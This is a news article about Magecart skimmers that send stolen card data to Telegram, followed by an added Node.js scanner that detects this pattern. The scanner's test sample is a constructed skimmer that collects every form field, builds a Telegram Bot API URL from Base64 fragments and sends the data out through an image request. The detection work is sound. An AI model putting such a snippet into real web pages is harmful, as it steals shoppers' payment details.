Cybercriminals attacking online stores have adopted a new tactic: they use the Telegram messaging app to send payment details stolen from compromised websites back to the attackers.
Security researcher Kraut explained in a Twitter thread how the script works, noting that it harvests data from every type of input field on the page and sends it to a Telegram channel.
Magecart groups, which target online shopping cart systems, usually inject e-skimmers into shopping websites after gaining access through a known vulnerability or stolen credentials, and then steal credit card details from the checkout page.
Recently they have stepped up their efforts to evade detection, hiding card-stealer code inside image metadata and even carrying out IDN homograph attacks to plant web skimmers concealed within a website's favicon file.
What is new this time is the exfiltration method. The stolen data (name, address, credit card number, expiry date, and CVV) is delivered as an instant message to a private Telegram channel, using a bot ID that is stored in encoded form in the skimmer code.
The information is encrypted with a public key before it leaves the victim's browser, and a Telegram bot then posts the encrypted data into the chat as a message.
The advantage for the threat actors is that they do not have to set up separate command-and-control infrastructure to receive the collected information, and they avoid the risk of having their own domains taken down or blocked by anti-malware services.
Jérôme Segura, Director of Threat Intelligence at Malwarebytes, who also analyzed this script, stated that defending against this type of skimming attack is a little trickier since it depends on a legitimate communication service. One could block all connections to Telegram at the network level, but it is easy for the attackers to switch to another provider or platform and still get away with it.
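As an added example (written for this page, not code from Kraut's thread or from Malwarebytes' analysis), the following Node.js script shows a detection approach that complements the network-level blocking described above: instead of blocking Telegram, it statically scans a script served on a checkout page for the Telegram exfiltration pattern. It assumes the skimmer reaches the Telegram Bot API over HTTPS (the public `api.telegram.org` host and its `sendMessage` method) and hides the endpoint in Base64 string literals, as the article's description of an "encoded bot ID" suggests. The sample skimmer, its bot token and its chat ID are constructed placeholders, not material from a real infection.

```javascript
// Added example, not the skimmer analysed on this page: a static scan for the
// Telegram exfiltration pattern. It looks for Telegram Bot API markers both in
// plain text and inside Base64 string literals, and checks whether the script
// also harvests form inputs. The sample script at the bottom is constructed.

// Indicators of Telegram Bot API use: the API host, the sendMessage method,
// the chat_id parameter and the shape of a bot token (<numeric id>:<secret>).
const TELEGRAM_MARKERS = [
  { name: 'api-host', re: /api\.telegram\.org/i },
  { name: 'send-message', re: /sendMessage/ },
  { name: 'chat-id', re: /chat_id=/ },
  { name: 'bot-token', re: /\d{8,10}:[A-Za-z0-9_-]{30,}/ },
];

// Pull out Base64-looking string literals (16+ chars) and keep the ones that
// decode to printable ASCII; skimmers commonly hide their endpoint this way.
function decodeBase64Literals(src) {
  const found = [];
  const re = /["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(decoded)) found.push({ encoded: m[1], decoded });
  }
  return found;
}

// Match every marker against the raw source and against each decoded literal.
function findTelegramIndicators(src) {
  const hits = [];
  for (const { name, re } of TELEGRAM_MARKERS) {
    if (re.test(src)) hits.push({ marker: name, where: 'plain', encoded: null, decoded: null });
  }
  for (const { encoded, decoded } of decodeBase64Literals(src)) {
    for (const { name, re } of TELEGRAM_MARKERS) {
      if (re.test(decoded)) hits.push({ marker: name, where: 'base64', encoded, decoded });
    }
  }
  return hits;
}

// Does the script enumerate form fields the way the skimmer does
// (every input/select/textarea rather than one specific element)?
const HARVEST_RE = /(querySelectorAll|getElementsByTagName)\s*\(\s*["'`][^"'`]*\b(input|select|textarea)\b/;

// Combine both signals: Telegram contact plus bulk input harvesting is the
// exfiltration pattern; Telegram contact alone is worth a look but not a verdict.
function assessScript(src) {
  const indicators = findTelegramIndicators(src);
  const harvestsInputs = HARVEST_RE.test(src);
  let verdict = 'clean';
  if (indicators.length > 0) verdict = harvestsInputs ? 'telegram-exfil' : 'telegram-contact';
  return { indicators, harvestsInputs, verdict };
}

// Constructed sample in the style described in the article: harvest all fields,
// build the Bot API URL from Base64 pieces, exfiltrate via an image request.
// The token and chat id are placeholders, not real credentials.
const b64 = (s) => Buffer.from(s, 'utf8').toString('base64');
const CONSTRUCTED_SKIMMER = [
  'var f=document.querySelectorAll("input,select,textarea"),d=[];',
  'for(var i=0;i<f.length;i++)d.push(f[i].name+"="+f[i].value);',
  'var u=atob("' + b64('https://api.telegram.org/bot') + '")',
  '  +atob("' + b64('1234567890:AAExampleExampleExampleExampleExample') + '")',
  '  +atob("' + b64('/sendMessage?chat_id=-1001234567890&text=') + '");',
  'new Image().src=u+encodeURIComponent(btoa(d.join("&")));',
].join('\n');

// Constructed benign script: touches the same inputs but contacts nothing.
const BENIGN_SCRIPT = 'document.querySelectorAll("input").forEach(function(e){e.autocomplete="off";});';

console.log(JSON.stringify(assessScript(CONSTRUCTED_SKIMMER), null, 2));
console.log('benign verdict:', assessScript(BENIGN_SCRIPT).verdict);
```

The Base64 decoding step is what makes the difference in practice: a plain grep for `api.telegram.org` over the checkout page's scripts finds nothing when the endpoint is assembled from encoded fragments, whereas decoding every long Base64-looking literal surfaces the host, the bot token and the `chat_id` parameter. Running the same scan over a site's scripts on a schedule catches a move to another messaging provider only if its markers are added to the list, which is the limitation Segura points out.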
Segura says that Malwarebytes has identified a few online stores infected with this variant of the payment card skimmer. However, the researcher states that there might be even more that have been infected.